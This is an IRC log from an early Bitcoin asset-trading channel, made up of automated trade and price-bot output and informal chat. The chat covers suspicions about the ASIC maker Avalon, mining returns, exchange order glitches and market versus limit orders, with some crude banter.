Jan 29 14:44:50 so sad. Jan 29 14:45:05 o ? Jan 29 14:45:57 i always say dat Jan 29 14:46:00 up or down. Jan 29 14:46:01 :) Jan 29 14:46:05 lol Jan 29 14:46:23 that's because you're not old enough to smoke. Jan 29 14:46:32 rofl Jan 29 14:46:57 did you come to that part btw Jan 29 14:47:01 or finished before it Jan 29 14:47:05 lol mircea_popescu Jan 29 14:47:45 kakobrekla i got as far as to where some dood walks in and kills the ho atop him Jan 29 14:47:48 SomeoneWeird :p Jan 29 14:47:55 STAY STRONG Jan 29 14:47:59 LONG AND STRONG Jan 29 14:48:11 mircea_popescu ill pay you 1btc to finish it :) Jan 29 14:48:12 o hallo bugsy. how's teh 50s ? Jan 29 14:48:19 well Jan 29 14:48:30 kakobrekla lol ok. i'll put it on the bj list Jan 29 14:48:37 it appears some asshole decided to sell 10,000 BTC at 19.75 Jan 29 14:48:45 MPEX options did not quench this rally Jan 29 14:48:56 all rallies eventually get it in the ass. Jan 29 14:49:01 they're sluts. Jan 29 14:49:31 this one isn't sure what she wants to do. Jan 29 14:49:38 so uncommon, that. Jan 29 14:50:11 also on the 1D chart, it looks like a straight line up Jan 29 14:50:18 o ya Jan 29 14:50:23 where's your ponzichart ? Jan 29 14:50:26 which my TA skillz says is like totally going to 50 Jan 29 14:50:47 ponzichart is a little fucked up due to the valuation of these calls Jan 29 14:50:51 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=60&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Jan 29 14:51:00 that ? isn't that supposed to be a gravestone, ie, end of trend ? Jan 29 14:51:07 Bugpowder do share. Jan 29 14:53:38 [MPEX] [S.MPOE] 2267 @ 0.00064702 = 1.4668 BTC [-] Jan 29 14:53:50 also, this http://polimedia.us/dtng/c/src/135946401856.jpg Jan 29 14:58:24 http://imgur.com/a/EsExY Jan 29 14:58:34 assuming midmarket valuation of the calls Jan 29 15:00:19 I made an account and an album! Jan 29 15:00:33 haha Jan 29 15:00:39 the Ponzi Album Jan 29 15:01:21 anyway, it deponzified a little. Jan 29 15:02:09 just wait till the price goes to @& Jan 29 15:02:11 27 Jan 29 15:02:20 baby poking at the keyboard Jan 29 15:02:31 dont sell my calls baby! Jan 29 15:04:04 lol Jan 29 15:04:13 baby sells your calls at market and your sdice at 18 Jan 29 15:04:25 matlab is in control now Jan 29 15:04:41 except when it crashes Jan 29 15:04:52 still working out the kinks Jan 29 15:05:53 [MPEX] [S.MPOE] 3800 @ 0.00066541 = 2.5286 BTC [+] Jan 29 15:10:08 Technische Universität Wien? not bad Jan 29 15:13:17 [BTCTC] [B.YABMC] 33 @ 0.03 = 0.99 BTC [-] Jan 29 15:13:35 [MPEX] [S.MPOE] 8750 @ 0.00065229 = 5.7075 BTC [-] Jan 29 15:15:11 what's that ? Jan 29 15:23:16 [MPEX] [S.MPOE] 6238 @ 0.0006509 = 4.0603 BTC [-] Jan 29 15:28:26 [MPEX] [S.MPOE] 8350 @ 0.0006509 = 5.435 BTC [-] Jan 29 15:30:04 ;;bids 19 Jan 29 15:30:06 There are currently 0 bitcoins demanded at or over 19.0 USD, worth 0.0 USD in total. Jan 29 15:34:26 [MPEX] [S.DICE] 169 @ 0.007395 = 1.2498 BTC [+] Jan 29 15:38:00 [BTCTC] [GSDPT] 20 @ 0.0074 = 0.148 BTC [-] Jan 29 15:39:20 ;;ticker Jan 29 15:39:21 BTCUSD ticker | Best bid: 18.90010, Best ask: 18.98979, Bid-ask spread: 0.08969, Last trade: 18.98979, 24 hour volume: 93620.39733442, 24 hour low: 17.90100, 24 hour high: 19.78000, 24 hour vwap: 18.79166 Jan 29 15:40:29 [MPEX] [S.MPOE] 9222 @ 0.00064702 = 5.9668 BTC [-] Jan 29 15:42:36 ;;ticker Jan 29 15:42:36 BTCUSD ticker | Best bid: 18.95000, Best ask: 18.98978, Bid-ask spread: 0.03978, Last trade: 18.95000, 24 hour volume: 92611.87472610, 24 hour low: 17.90100, 24 hour high: 19.78000, 24 hour vwap: 18.79870 Jan 29 15:45:33 [MPEX] [S.MPOE] 5400 @ 0.00064702 = 3.4939 BTC [-] Jan 29 15:46:10 DeadWeasel, i just called ticker. do you have me on ignore? :DDD Jan 29 15:46:57 no sorry, i was registering my nick, text cleared it all off, didn't see it Jan 29 15:48:32 trying to get my IRC feet back under me. Jan 29 15:49:54 https://bitcointalk.org/index.php?topic=139704.msg1487845;topicseen#msg1487845 Jan 29 15:53:41 DeadWeasel, np Jan 29 15:59:46 ;;bids 19 Jan 29 15:59:48 There are currently 216.72419 bitcoins demanded at or over 19.0 USD, worth 4117.75965731 USD in total. Jan 29 16:08:05 [MPEX] [S.MPOE] 1800 @ 0.0006509 = 1.1716 BTC [+] Jan 29 16:09:07 [BTCTC] [B.YABMC] 100 @ 0.027 = 2.7 BTC [-] Jan 29 16:10:14 [MPEX] [S.MPOE] 66 @ 0.00064702 = 0.0427 BTC [-] Jan 29 16:10:16 [MPEX] [S.MPOE] 9905 @ 0.00064701 = 6.4086 BTC [-] Jan 29 16:10:37 [BTCTC] [B.YABMC] 966 @ 0.026 = 25.116 BTC [-] Jan 29 16:18:02 [HAVELOCK] [SDICE] 14 @ 0.77999999 = 10.92 BTC [-] Jan 29 16:20:10 ;;bids 19 Jan 29 16:20:11 There are currently 708.80583 bitcoins demanded at or over 19.0 USD, worth 13486.4642488 USD in total. Jan 29 16:20:25 ;;bc,24hprc Jan 29 16:20:26 18.78 Jan 29 16:26:42 kakobrekla and so it begins. Jan 29 16:27:41 Bitcoin Only, no refunds etc. Jan 29 16:35:52 [MPEX] [S.MPOE] 2300 @ 0.00064701 = 1.4881 BTC [-] Jan 29 16:36:43 avalon really is looking more like a scam isnt it Jan 29 16:37:00 "yay we shipped! but, you might not get it for a few months, we cant do anything about shipping times" Jan 29 16:37:09 "now pre-order our next batch before you get the current ones" Jan 29 16:37:55 i just dont understand WHY they couldnt release a simple video of their units hashing away Jan 29 16:38:06 well, i do, becuase they dont exist... Jan 29 16:38:18 yeah. Jan 29 16:38:49 no asics this year. Jan 29 16:39:38 prolly wrong. Jan 29 16:40:03 you think ? Jan 29 16:40:38 i think BFL will deliver in april Jan 29 16:40:43 maybe march Jan 29 16:41:03 im in contact with 2 different asic devs and none of them has even announced anything, yet i know one was ahead of bfl Jan 29 16:41:51 " Only Bitcoin will allow us to move half a million USD in a few hours into places they are suppose to go to." Jan 29 16:41:55 this is particularly stupid. Jan 29 16:42:24 kakobrekla maybe. asics are a hard problem tho. Jan 29 16:43:01 "places they are supposed to go" -- aka "into our scam artist pockets before they catch the next plane to south america" Jan 29 16:43:08 "How else did you expect us to produce a functional ASIC unit in the same length of time a competitor has been delayed?" Jan 29 16:43:14 i wonder if this sounded better in chinese. Jan 29 16:44:25 [MPEX] [S.MPOE] 976 @ 0.00064701 = 0.6315 BTC [-] Jan 29 16:44:27 [MPEX] [S.MPOE] 11074 @ 0.00064666 = 7.1611 BTC [-] Jan 29 16:44:35 if BFL is not delivering, what about those other guys? Jan 29 16:44:59 basic basically admitted they were... lieing about everything. Jan 29 16:45:08 avalon seems pretty much a scam on the strength of this latest move. Jan 29 16:45:10 what other guys ? Jan 29 16:46:30 let me look up his name. there was a thread how they delivered a ASIC and one gets shipped to BTC foundation and so on Jan 29 16:46:40 this is it. Jan 29 16:46:43 avalon Jan 29 16:47:08 i guess there's also the asicminer ppl. tho they're about three weeks late on their revised estimates without a good reason by now/ Jan 29 16:50:02 avalon was a scam too? Jan 29 16:50:36 I guess anything to do with mining turns out to be a scam sooner or later Jan 29 16:51:02 azx that's what we're discussing. avalon's most recent announcement. Jan 29 16:51:56 i was afk. url Jan 29 16:52:13 https://bitcointalk.org/index.php?topic=139704.msg1487845;topicseen#msg1487845 Jan 29 16:52:47 jesus $19.79 Jan 29 16:53:06 im curious if it can cross the psychological 20 Jan 29 16:54:14 mircea_popescu: do you live off of income from your bitcoin activities? Jan 29 16:54:25 nope. Jan 29 16:54:40 do you ever convert your BTC to fiat? Jan 29 16:54:46 rarely if at all. Jan 29 16:54:54 what do you do for a living? if you don't mind me asking Jan 29 16:55:06 i retired back in 2004 Jan 29 16:55:11 ;;asks Jan 29 16:55:11 (asks [--over] ) -- Calculate the amount of bitcoins for sale at or under . If '--over' option is given, find coins or at or over . Jan 29 16:55:13 " Avalon need the money before this weekend starts " - lol Jan 29 16:55:24 ;;asks 20 Jan 29 16:55:25 There are currently 9992.735 bitcoins offered at or under 20.0 USD, worth 199300.135435 USD in total. Jan 29 16:55:32 mircea_popescu: I'm guessing you did financial stuff? Jan 29 16:55:39 in a sense, yeah. Jan 29 16:55:40 ;;bids 18 Jan 29 16:55:42 There are currently 18004.054 bitcoins demanded at or over 18.0 USD, worth 331312.635666 USD in total. Jan 29 16:56:12 mircea_popescu: is a romanian mobster Jan 29 16:56:31 there's a romanian mob now ? Jan 29 16:57:15 mircea_popescu: want to bet that Avalon is a scam? Jan 29 16:57:41 ;;seen smickles Jan 29 16:57:42 smickles was last seen in #bitcoin-assets 10 hours, 3 minutes, and 26 seconds ago: oh, and it's payably only via bitcoin now Jan 29 16:57:58 dust-otc: http://bitbet.us/bet/34/an-asic-unit-from-either-bfl-avalon-or/ Jan 29 16:58:00 dust-otc how do we bet ? Jan 29 16:59:00 pizzaman1337: read the forums :) Jan 29 16:59:06 Even odds, Avalon delivers a working ASIC unit by Mar. 1 Jan 29 16:59:10 if not, they are a scam Jan 29 16:59:31 dust-otc why not bitbet ? Jan 29 16:59:46 I don't like the variable odds Jan 29 16:59:59 more counterparty risk Jan 29 17:00:01 i don't like the having to keep track of private beds Jan 29 17:00:07 i already have a list and it's on my nerves ;/ Jan 29 17:00:08 and the BFL bet is terribly worded Jan 29 17:01:47 https://bitcointalk.org/index.php?topic=139704.msg1487970#msg1487970 lol the girl at ther finest. Jan 29 17:02:14 mircea_popescu: with the terms I listed, i'm willing to bet up to 100btc Jan 29 17:02:25 that they ship ? Jan 29 17:02:29 so it might be worth your time to keep track of Jan 29 17:02:57 what girl? Jan 29 17:03:02 that they aren't a scam, which requires that they ship, even if slightly delayed/ out of spec Jan 29 17:03:18 dust-otc well... im not sure i want even odds on that, and i'm not sure "a unit" means anything in this context. Jan 29 17:03:31 how about deliver 80% of their first batch by mar 1st. 240 units or w/e it was. Jan 29 17:03:47 Yes, I'll have 14 units of ASICs please. Jan 29 17:03:52 and i can't bring myself to throw 100 btc on this either, im not invested in them either way Jan 29 17:03:59 more of a sporting interest for me than anything else. Jan 29 17:04:40 I admit that it is possible that Avalon/BFL are scams, especially BFL, but I don't think it is likely Jan 29 17:04:49 and yet many people seem very sure they are scams Jan 29 17:05:12 their latest move makes it pretty convincing in my eyes. Jan 29 17:05:45 yes, really, is it so hard to produce convincing multimedia evidence? Jan 29 17:05:51 Everyone is getting mad that avalon is taking orders for a 2nd batch before they shipped the first, and yet BFL has been doing this all along Jan 29 17:05:57 2nd, 3rd, .. Nth batches Jan 29 17:06:10 the problem with "are scams" arguments in btc is that the chances of it becoming purely semantinc are so high. most are idiots rather than scammers i guess. Jan 29 17:06:17 jurov: true, they really should post proof Jan 29 17:06:21 and it just keeps going Jan 29 17:06:32 im okay with them being scams, my fpga's keep plugging along Jan 29 17:06:38 making 100+BTC/month Jan 29 17:06:54 yeah i think fpgas will turn out to be the best investments ever. Jan 29 17:06:55 the longer asics are delayed, the more moneys worth i get from the fpgas Jan 29 17:07:14 yours paid for themselves already ? Jan 29 17:07:24 woohoo avalon batch #2 Jan 29 17:07:37 topace: BFL or others? Jan 29 17:07:51 jcpham: So, we have a problem. Avalon need the money before this weekend starts to place orders for the parts. :) Jan 29 17:07:52 yup more than 100% paid off Jan 29 17:07:54 mostly BFL Jan 29 17:08:14 yeah. you too ka risk but it paid off. Jan 29 17:08:22 and if htey actually do ship asics, each one is worth its trade in value back to them too Jan 29 17:08:24 i contemplated it at the time but preferred to pass. Jan 29 17:08:25 i like how the price is going up making my gpus seem less crazy Jan 29 17:08:45 mircea_popescu: you did finance? What exactly? Jan 29 17:08:45 jcpham i suspect the more efficient gpus are atm the baseline Jan 29 17:08:59 I really should try to fix up some of my gpus Jan 29 17:09:12 mining is getting fairly profitable again Jan 29 17:09:24 diff rose, price rose, diff dropped, price dropped Jan 29 17:09:30 now the diff is rising again Jan 29 17:09:35 guess what happens next Jan 29 17:09:36 mining profitability http://smpake.com/etc/btc/charts.php Jan 29 17:09:51 azx i've never commented on that topic. Jan 29 17:10:23 ;;ticker Jan 29 17:10:23 BTCUSD ticker | Best bid: 19.39000, Best ask: 19.39224, Bid-ask spread: 0.00224, Last trade: 19.38924, 24 hour volume: 102254.25858682, 24 hour low: 17.90100, 24 hour high: 19.80000, 24 hour vwap: 18.88041 Jan 29 17:10:37 ;;calc 102254*[ticker --avg] Jan 29 17:10:38 1930597.44414 Jan 29 17:10:52 kakobrekla is that gross revenue ? Jan 29 17:11:02 ;;calc 102254*[ticker --avg]*.0005 Jan 29 17:11:03 965.30536858 Jan 29 17:11:08 >>http://smpake.com/etc/btc/charts.php Jan 29 17:11:10 eh Jan 29 17:11:16 what is gox's fee Jan 29 17:11:19 .005 Jan 29 17:11:24 or .0005 Jan 29 17:11:27 "pizzaman1337 | mircea_popescu: I'm guessing you did financial stuff?" - mircea_popescu | in a sense, yeah. Jan 29 17:11:45 mircea_popescu its daily 100mhash revenue Jan 29 17:11:57 just curious Jan 29 17:11:59 as in, expected btc mined ? Jan 29 17:12:02 ya Jan 29 17:12:13 isnt it clear? Jan 29 17:12:22 was curious if any cost of wattage substracted Jan 29 17:12:27 nope Jan 29 17:12:40 what's that for 100mh on gpus, like 10-15 cents ? Jan 29 17:13:06 dunno Jan 29 17:13:30 im out of gpus for long time Jan 29 17:15:02 [MPEX] [S.DICE] 430 @ 0.007395 = 3.1799 BTC [+] Jan 29 17:18:31 [MPEX] [S.DICE] 1353 @ 0.007395 = 10.0054 BTC [+] Jan 29 17:20:37 [MPEX] [S.MPOE] 4050 @ 0.0006509 = 2.6361 BTC [+] Jan 29 17:27:58 [MPEX] [S.MPOE] 6212 @ 0.0006509 = 4.0434 BTC [+] Jan 29 17:28:00 [MPEX] [S.MPOE] 2304 @ 0.00065185 = 1.5019 BTC [+] Jan 29 17:30:01 [MPEX] [S.MPOE] 925 @ 0.00064666 = 0.5982 BTC [-] Jan 29 17:30:03 [MPEX] [S.MPOE] 4525 @ 0.00064421 = 2.9151 BTC [-] Jan 29 17:30:04 [MPEX] [S.MPOE] 10000 @ 0.0006438 = 6.438 BTC [-] Jan 29 17:30:05 [MPEX] [S.MPOE] 8900 @ 0.00064372 = 5.7291 BTC [-] Jan 29 17:30:07 [MPEX] [S.MPOE] 5900 @ 0.0006437 = 3.7978 BTC [-] Jan 29 17:40:11 [MPEX] [S.MPOE] 1574 @ 0.0006437 = 1.0132 BTC [-] Jan 29 17:40:13 [MPEX] [S.MPOE] 1926 @ 0.00064358 = 1.2395 BTC [-] Jan 29 17:45:34 [MPEX] [S.MPOE] 5600 @ 0.00064358 = 3.604 BTC [-] Jan 29 17:46:51 ;;asks 19 Jan 29 17:46:52 There are currently 0 bitcoins offered at or under 19.0 USD, worth 0.0 USD in total. Jan 29 17:47:02 ;;asks 32 Jan 29 17:47:05 There are currently 46192.853 bitcoins offered at or under 32.0 USD, worth 1106817.5498 USD in total. Jan 29 17:48:13 [MPEX] [S.DICE] 604 @ 0.00737556 = 4.4548 BTC [-] Jan 29 17:50:38 A graphics update! Jan 29 17:50:52 Bugpowder haha you mean mpex ? Jan 29 17:51:13 it IS easier to view Jan 29 17:51:24 yeah. the reverse color nonsense had to go Jan 29 17:51:42 https://i.chzbgr.com/maxW500/6974317568/hAD51E1D3/ Jan 29 17:52:30 ahahaah Jan 29 17:55:32 [MPEX] [S.MPOE] 5004 @ 0.00064358 = 3.2205 BTC [-] Jan 29 17:55:34 [MPEX] [S.MPOE] 7840 @ 0.00064239 = 5.0363 BTC [-] Jan 29 17:59:34 [MPEX] [S.MPOE] 4321 @ 0.00065165 = 2.8158 BTC [+] Jan 29 17:59:35 [MPEX] [S.MPOE] 9742 @ 0.00065185 = 6.3503 BTC [+] Jan 29 18:00:21 ;; bids 19 Jan 29 18:00:23 There are currently 1491.2595 bitcoins demanded at or over 19.0 USD, worth 28499.0119229 USD in total. Jan 29 18:00:46 asks 30 Jan 29 18:00:49 ;;asks 30 Jan 29 18:00:51 There are currently 38880.635 bitcoins offered at or under 30.0 USD, worth 870816.70782 USD in total. Jan 29 18:06:02 [HAVELOCK] [SDICE] 17 @ 0.77999999 = 13.26 BTC [-] Jan 29 18:07:02 [HAVELOCK] [SDICE] 3 @ 0.78 = 2.34 BTC [+] Jan 29 18:09:51 wait, why are you getting different answers than me Jan 29 18:10:13 [11:08:14] ;;bids 19.33 Jan 29 18:10:13 [11:08:18] There are currently 43.917217 bitcoins demanded at or over 19.33 USD, worth 849.358102304 USD in total. Jan 29 18:10:29 oh, you went from 19 Jan 29 18:10:30 hrm Jan 29 18:15:08 [MPEX] [S.DICE] 196 @ 0.00737236 = 1.445 BTC [-] Jan 29 18:15:10 [MPEX] [S.DICE] 104 @ 0.007395 = 0.7691 BTC [+] Jan 29 18:25:33 [MPEX] [S.DICE] 51989 @ 0.007395 = 384.4587 BTC [+] Jan 29 18:25:50 [MPEX] [O.BTCUSD.P200T] 815 @ 0.25823903 = 210.4648 BTC [+] Jan 29 18:26:44 www.btctoys.com if someone fancies sex toys and other stuff like that...just got my order:D:D Jan 29 18:27:54 damn. I thought someone just sold me some puts Jan 29 18:28:54 spamming this chan is becoming popular ;/ Jan 29 18:29:53 [MPEX] [S.MPOE] 2394 @ 0.00065167 = 1.5601 BTC [-] Jan 29 18:35:34 http://www.theblaze.com/stories/2013/01/29/should-you-be-concerned-about-obamas-new-sec-chairman-pick/ Jan 29 18:35:38 [MPEX] [S.MPOE] 8250 @ 0.00064972 = 5.3602 BTC [-] Jan 29 18:35:50 new sec head. obama declares war on bitcoinz ? Jan 29 18:37:23 prob not Jan 29 18:39:32 what;'s this, the 4th woman in a row ? Jan 29 18:40:52 [MPEX] [S.MPOE] 400 @ 0.00065167 = 0.2607 BTC [+] Jan 29 18:41:47 https://bitcointalk.org/index.php?topic=139415.msg1484896#msg1484896 Jan 29 18:41:53 its over 9000 fyi. Jan 29 18:42:10 also the dude should get a domain like 15Kpizza.com or smth Jan 29 18:46:07 kakobrekla over 10k is over 9k overmore. Jan 29 18:46:53 not the point Jan 29 18:47:00 the cultural reference is 9k Jan 29 18:47:09 like the volume and 11. Jan 29 18:47:51 ya well... Jan 29 18:48:56 http://www.youtube.com/watch?v=9CYaU3x_nRU Jan 29 18:51:17 [MPEX] [S.MPOE] 1527 @ 0.00065167 = 0.9951 BTC [+] Jan 29 18:51:19 [MPEX] [S.MPOE] 1654 @ 0.00065185 = 1.0782 BTC [+] Jan 29 18:51:20 [MPEX] [S.MPOE] 2419 @ 0.00065289 = 1.5793 BTC [+] Jan 29 18:52:18 [MPEX] [S.MPOE] 3050 @ 0.00064972 = 1.9816 BTC [-] Jan 29 18:52:20 [MPEX] [S.MPOE] 1000 @ 0.0006427 = 0.6427 BTC [-] Jan 29 19:29:30 kakobrekla: mircea_popescu is too old to understand cultural references Jan 29 19:38:34 [MPEX] [S.MPOE] 5650 @ 0.00065021 = 3.6737 BTC [+] Jan 29 19:38:35 [MPEX] [S.MPOE] 1650 @ 0.00065281 = 1.0771 BTC [+] Jan 29 19:47:51 ;;asks 32 Jan 29 19:47:53 There are currently 48702.375 bitcoins offered at or under 32.0 USD, worth 1158562.45361 USD in total. Jan 29 19:52:12 ;;bids 17 Jan 29 19:52:14 There are currently 36814.212 bitcoins demanded at or over 17.0 USD, worth 662237.029233 USD in total. Jan 29 19:52:20 ;;asks 18 Jan 29 19:52:21 There are currently 0 bitcoins offered at or under 18.0 USD, worth 0.0 USD in total. Jan 29 19:52:25 ;;asks 19 Jan 29 19:52:27 There are currently 0 bitcoins offered at or under 19.0 USD, worth 0.0 USD in total. Jan 29 19:52:32 ;;asks 20 Jan 29 19:52:33 There are currently 15030.94 bitcoins offered at or under 20.0 USD, worth 298647.633689 USD in total. Jan 29 19:52:39 geeeze Jan 29 19:53:29 ;bids 18 Jan 29 19:59:54 protip : "/msg gribble ;;bids 18" Jan 29 20:02:08 not this again Jan 29 20:02:17 XP Jan 29 20:03:18 [MPEX] [S.MPOE] 2671 @ 0.00065281 = 1.7437 BTC [+] Jan 29 20:03:20 [MPEX] [S.MPOE] 10029 @ 0.00065289 = 6.5478 BTC [+] Jan 29 20:03:57 ls Jan 29 20:08:46 ;;later tell Namworld send me an email later if I am not around so that I can get in touch with you about the vps, I wrote up everything this morning. send me a message Jan 29 20:08:49 The operation succeeded. Jan 29 20:18:02 bugpowder: mind blown, thank you! Jan 29 20:20:28 ahaha Jan 29 20:25:59 I used to be the same way :,-D Jan 29 20:27:56 the same way what? Jan 29 20:28:03 gotta start somewhere. Jan 29 20:28:16 ignorant IRC / gribble user. like me. Jan 29 20:28:24 lol Jan 29 20:28:47 are there "mutual funds" for bitcoin assets? Jan 29 20:29:10 mircea_popescu: will there ever be a limited number of seats to mpex? Jan 29 20:29:17 yeah Jan 29 20:29:24 possibly. Jan 29 20:29:24 most of them are accually mutual scams Jan 29 20:29:52 DeadWeasel we're not quite there yet. Jan 29 20:30:12 seems like the best way to get us ignorant folk into the game. but maybe ignorant folk in the asset game is a bad thing. i don't know. Jan 29 20:30:19 ok Jan 29 20:31:07 it's a pretty bad thing, yes. Jan 29 20:31:22 we don't yet have the infrastructure to support naive investment, Jan 29 20:31:31 and for that matter naive investment doesn't work too well in fiat anyway. Jan 29 20:35:20 "Asking for up to 5btc loan- returning 3%/day in a 2-4 weeks" Jan 29 20:35:31 ;;calc 1.03 ** 365 Jan 29 20:35:32 48482.7245275 Jan 29 20:35:37 could be worse... Jan 29 20:39:40 https://bitcointalk.org/index.php?topic=139755.msg1488452#msg1488452 Jan 29 20:39:41 ha Jan 29 20:42:14 ^^ Ukto Jan 29 20:42:54 heh Jan 29 20:44:23 willing to answer any Q's regarding how btct.co actually functions Jan 29 20:44:55 hmm assbot isnt announcing Jan 29 20:45:50 burnside, you seem to take it rather personally Jan 29 20:46:06 mpex also isnt processing trades Jan 29 20:47:16 i placed an order, its not in my STAT and it hasnt been executed Jan 29 20:47:31 did you get a receipt for your order? Jan 29 20:47:34 it'd be nice if the BUY response provided the order id Jan 29 20:47:52 Your order to BUY 3500 S.DICE @0.00750000BTC each has been received and will be processed. Jan 29 20:48:06 topace, it may take 20 seconds for order to surface Jan 29 20:48:15 its been over a minute Jan 29 20:48:17 do you have enough in your account to cover the trade? Jan 29 20:48:21 lol yes Jan 29 20:48:26 im not a newb here :p Jan 29 20:48:31 ummm. Jan 29 20:48:32 jurov, yeah, I do. I don't have a pr person to set ppl straight like MP, gotta do it myself. :( Jan 29 20:48:42 there was also a trade on havelock that wasnt announced by assbot Jan 29 20:48:43 arnt you the guy who sent the rounded btc to mircea_popescu? Jan 29 20:48:56 lol no :p Jan 29 20:49:17 hmm. Jan 29 20:49:19 *shrug* Jan 29 20:49:47 burnside, i mean what is it good for - if after having argument on irc, i'll to go to btctalk and announce there "look he said this, he is a liar, etc" Jan 29 20:49:57 mircea_popescu: problems? Jan 29 20:50:08 well, it'd be one thing if I were here and it were an argument. :) Jan 29 20:50:25 or if he'd pm'd and said, "hey, I think there might be a hole" Jan 29 20:50:34 as I've done for him a couple of times. Jan 29 20:51:16 he's been on the exchange long enough to know it doesn't work like that. Jan 29 20:51:26 he's intentionally doing that. Jan 29 20:51:40 and it's not the first time... Jan 29 20:51:43 hm, i see Jan 29 20:52:07 OH. i see what your issue is topace Jan 29 20:52:22 there are asks below the amount you put in Jan 29 20:52:47 if you want to buy 3500 @ market rate just do: "BUY|S.DICE|3500" Jan 29 20:53:05 the new pympex requires the 4th parameter Jan 29 20:53:09 lol Jan 29 20:53:11 for the confirmation calculation Jan 29 20:53:13 they're doing it wrong then Jan 29 20:53:22 but you can place a bid higher Jan 29 20:53:29 you should never use a market order, ever Jan 29 20:53:51 look at the bid/ask list Jan 29 20:53:57 nao Jan 29 20:54:01 i placed a BID for 3500 at 750000 Jan 29 20:54:06 that should get filled Jan 29 20:54:12 highest bid: .00728868 for 800 Jan 29 20:54:21 there's asks at 729764 Jan 29 20:54:26 lwest ask: .00729764 for 1341 Jan 29 20:54:29 and a lot at 739500 Jan 29 20:54:51 rightm so a bid at 750000 should eat up the asks at 0.00729764 and 0.00739500 Jan 29 20:55:08 so, im back to where i was, there's SOMETHING WRONG with the site :p Jan 29 20:55:12 my order says it was placed Jan 29 20:55:14 but its not in my order book Jan 29 20:55:17 look how many are offfered @ .00749999 Jan 29 20:55:25 SO? Jan 29 20:55:27 480`057 Jan 29 20:55:29 that is wy Jan 29 20:55:31 i placed a BID at 750000 Jan 29 20:55:31 mod6 Jan 29 20:55:33 BID Jan 29 20:55:33 you couldn't cover the trade Jan 29 20:55:37 u are rong Jan 29 20:55:45 topace the web servers are desynced atm Jan 29 20:55:49 if you can cover the trade it adjusts the number of shares Jan 29 20:55:56 to max you could buy Jan 29 20:56:00 cant Jan 29 20:56:14 back soon. Jan 29 20:56:21 mircea_popescu: ahh, k, see, i new there was a problem :p Jan 29 20:56:28 I have locked myself out of my account like that before. Jan 29 20:56:30 :/ Jan 29 20:57:17 well, sorry. Jan 29 20:57:28 [MPEX] [S.DICE] 1341 @ 0.00729764 = 9.7861 BTC [-] Jan 29 20:57:30 [MPEX] [S.DICE] 2159 @ 0.007395 = 15.9658 BTC [+] Jan 29 20:57:36 there it goes :p Jan 29 20:58:05 did u reorder it or was it just delayed Jan 29 21:01:01 just delayed Jan 29 21:05:49 it'd be nice if the BUY response provided the order id << the webserver does not know what ids the orders will end up with. Jan 29 21:06:52 you should never use a market order, ever << why not ? Jan 29 21:07:48 ok u can use one Jan 29 21:07:52 ahh Jan 29 21:08:00 so the webserver just forwards the request on Jan 29 21:08:02 gotcha Jan 29 21:08:15 dangerous in fast moving environment though Jan 29 21:08:46 for example S.BBET IPO Jan 29 21:09:21 you never know if some dude has placed a big order in front of you Jan 29 21:09:33 and blasts away the shares you thought you were buying Jan 29 21:09:49 then you end up buying S.DICE at .01 for example Jan 29 21:10:22 well yes Bugpowder. this is quantum finance. Jan 29 21:10:30 limit order guarantees price, doesn't guarantee execution Jan 29 21:10:38 market order guarantees execution, doesn't guarantee price Jan 29 21:10:41 pick your poison Jan 29 21:11:12 crystal meth. Jan 29 21:11:30 i wonder if they have crystal meth dildos on sr. Jan 29 21:11:35 should be a killer product. Jan 29 21:12:04 would you list sr on mpex Jan 29 21:12:42 mmm. kinda hard to verify their income huh Jan 29 21:14:20 [MPEX] [S.MPOE] 9100 @ 0.00065289 = 5.9413 BTC [+] Jan 29 21:23:05 [MPEX] [S.MPOE] 1524 @ 0.00065289 = 0.995 BTC [+] Jan 29 21:23:07 [MPEX] [S.MPOE] 3676 @ 0.00065373 = 2.4031 BTC [+] Jan 29 21:25:10 lol burnside_afk and ukto having a misunderstanding ? Jan 29 21:26:39 seems like it. he has an account on the system, it's easy to see how it works. Jan 29 21:27:06 I know he understands it under the hood, he coded the same stuff. Jan 29 21:29:46 i'll tell you something tho, it's good that you changed the way 7day etc volume is presented Jan 29 21:29:54 the 7k@7k stuff was beyond confusing. Jan 29 21:30:30 yeah, that was some good input from you guys Jan 29 21:30:50 I still don't like it much, but it's better than it was Jan 29 21:31:08 also a point : () is traditionally notation for negative figures Jan 29 21:31:30 yeah, one of the reasons I don't like it much. Jan 29 21:31:56 I'm not sure what to do with it. I tried and variations, etc. Jan 29 21:32:09 heh. leave share count plain make btc sum bold Jan 29 21:32:27 that's a good call, will give it a shot. Jan 29 21:32:50 and tot volume is glbse bullshit. either 30 day or 1 year Jan 29 21:32:52 [BTCTC] [BASIC-MINING] 2 @ 0.3399 = 0.6798 BTC [-] Jan 29 21:32:55 "total" is absolute nonsense Jan 29 21:33:17 you mean the all time total? Jan 29 21:33:30 "Tot Vol" Jan 29 21:34:23 that's a good point. I had it in there before I had 30d available, kind of as a sign of "seniority". Jan 29 21:34:38 ya but it leads to comparisons of unlike things Jan 29 21:34:56 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Jan 29 21:35:04 very true, could be dangerous Jan 29 21:35:35 [MPEX] [S.MPOE] 3321 @ 0.0006427 = 2.1344 BTC [-] Jan 29 21:35:36 [MPEX] [S.MPOE] 6360 @ 0.00064239 = 4.0856 BTC [-] Jan 29 21:35:38 [MPEX] [S.MPOE] 8816 @ 0.00064194 = 5.6593 BTC [-] Jan 29 21:35:39 [MPEX] [S.MPOE] 12623 @ 0.00064175 = 8.1008 BTC [-] Jan 29 21:35:40 [MPEX] [S.MPOE] 8875 @ 0.00064129 = 5.6914 BTC [-] Jan 29 21:35:42 [MPEX] [S.MPOE] 9500 @ 0.00064011 = 6.081 BTC [-] Jan 29 21:35:42 [MPEX] [S.MPOE] 12550 @ 0.00063952 = 8.026 BTC [-] Jan 29 21:35:43 [MPEX] [S.MPOE] 10083 @ 0.00063945 = 6.4476 BTC [-] Jan 29 21:35:44 [MPEX] [S.MPOE] 9900 @ 0.00063765 = 6.3127 BTC [-] Jan 29 21:35:46 [MPEX] [S.MPOE] 7684 @ 0.00063755 = 4.8989 BTC [-] Jan 29 21:35:47 [MPEX] [S.MPOE] 10000 @ 0.0006373 = 6.373 BTC [-] Jan 29 21:35:48 [MPEX] [S.MPOE] 25162 @ 0.00063728 = 16.0352 BTC [-] Jan 29 21:35:49 